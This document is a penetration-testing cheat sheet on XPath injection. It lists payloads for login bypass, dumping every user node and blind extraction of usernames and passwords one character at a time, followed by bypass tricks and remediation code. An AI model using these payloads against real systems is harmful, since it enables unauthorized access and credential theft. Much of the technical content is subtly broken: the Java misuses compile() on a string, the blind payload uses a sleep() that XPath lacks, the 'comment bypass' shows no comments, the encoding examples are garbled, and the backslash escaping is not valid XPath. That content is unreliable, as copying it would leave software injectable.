XPath Injection Vulnerability Testing

Overview

Vulnerability Principle

String xpath = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(xpath);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);

XPath Basics

Query Syntax

//user[username='admin']
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']

Functions

• text()

  - Retrieve text content

• count()

  - Count elements

• substring()

  - Extract substring

• string-length()

  - Get string length

• contains()

  - Check content inclusion

Testing Methods

1. Identify XPath Input Points

• User login
• Data search
• XML data query
• Configuration query

2. Basic Detection

' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1

' or '1'='1
' and '1'='2
' or 1=1 or '

3. Authentication Bypass

Username: admin' or '1'='1
Password: anything
Query: //user[username='admin' or '1'='1' and password='anything']

Username: admin') or ('1'='1
Query: //user[username='admin') or ('1'='1' and password='*']

4. Information Disclosure

' or 1=1 or '
' or '1'='1
') or 1=1 or ('

' or count(//user)>0 or '

' or substring(//user[1]/username,1,1)='a' or '

Exploitation Techniques

Authentication Bypass

Input: admin' or '1'='1
Query: //user[username='admin' or '1'='1' and password='*']
Result: Matches all users

Input: admin')] | //* | //*[('
Query: //user[username='admin')] | //* | //*[('' and password='*']

' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or '

Information Disclosure

' or 1=1 or '
Result: Returns all user nodes

' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
Retrieve each character step by step

' or substring(//user[1]/password,1,1)='p' or '
Retrieve password characters step by step

Blind Injection Techniques

' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '

' or substring(//user[1]/username,1,1)='a' or '
Observe response differences

Bypass Techniques

Encoding Bypass

' or '1'='1 → %27%20or%20%271%27%3D%271

' → '
" → "
< → &lt;
> → &gt;

Comment Bypass

' or 1=1 or '
' or '1'='1' or '

Function Bypass

substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]

Tool Usage

XPath Expression Testing

• XPath Tester
• XMLSpy
• Oxygen XML Editor

Burp Suite

1. Intercept XPath query requests
2. Modify query parameters
3. Observe response results

Python Script

from lxml import etree
from lxml.etree import XPath

# Load XML document
doc = etree.parse('users.xml')

# Test injection
xpath_expr = "//user[username='admin' or '1'='1']"
xpath = XPath(xpath_expr)
results = xpath(doc)
print(results)

Verification and Reporting

Verification Steps

1. Confirm control over XPath queries
2. Verify authentication bypass or information disclosure
3. Assess impact (unauthorized access, data leakage, etc.)
4. Record complete POC

Report Key Points

• Vulnerability location and input parameters
• XPath query construction method
• Complete exploitation steps and PoC
• Remediation recommendations (input validation, parameterized queries, etc.)

Protection Measures

Recommended Solutions

1. Input Validation
   java

   private static final String[] XPATH_ESCAPE_CHARS = 
       {"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "};
   
   public static String escapeXPath(String input) {
       if (input == null) {
         return null;
       }
       StringBuilder sb = new StringBuilder();
       for (int i = 0; i < input.length(); i++) {
         char c = input.charAt(i);
         if (Arrays.asList(XPATH_ESCAPE_CHARS).contains(String.valueOf(c))) {
           sb.append("\\");
         }
         sb.append(c);
       }
       return sb.toString();
   }

2. Parameterized Queries
   java

   // Use XPath variables
   String xpath = "//user[username=$username and password=$password]";
   XPathExpression expr = xpath.compile(xpath);
   XPathVariableResolver resolver = new MapVariableResolver(
       Map.of("username", escapedUsername, "password", escapedPassword));
   expr.setXPathVariableResolver(resolver);

3. Whitelist Validation
   java

   // Only allow specific characters
   if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
       throw new IllegalArgumentException("Invalid input");
   }

4. Use Precompiled Queries
   java

   // Predefined query template
   private static final String LOGIN_QUERY = 
       "//user[username=$1 and password=$2]";
   
   // Use parameter binding

5. Least Privilege
   • Restrict XPath query scope
   • Use access control
   • Limit queryable nodes

Notes

• Only perform in authorized testing environments
• Note syntax differences between different XPath versions
• Avoid impacting XML data during testing
• Understand the target application's XPath implementation